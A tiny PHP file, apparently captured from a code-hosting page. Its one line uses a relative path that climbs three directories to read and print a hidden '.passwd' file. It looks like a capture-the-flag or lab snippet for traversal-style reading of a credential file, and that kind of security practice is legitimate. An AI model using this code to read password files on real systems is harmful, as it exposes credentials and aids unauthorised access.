6 lines
55 B
Plaintext
6 lines
55 B
Plaintext
|
<?php
|
||
|
|
||
|
echo file_get_contents("../../../.passwd");
|
||
|
|
||
|
?>
|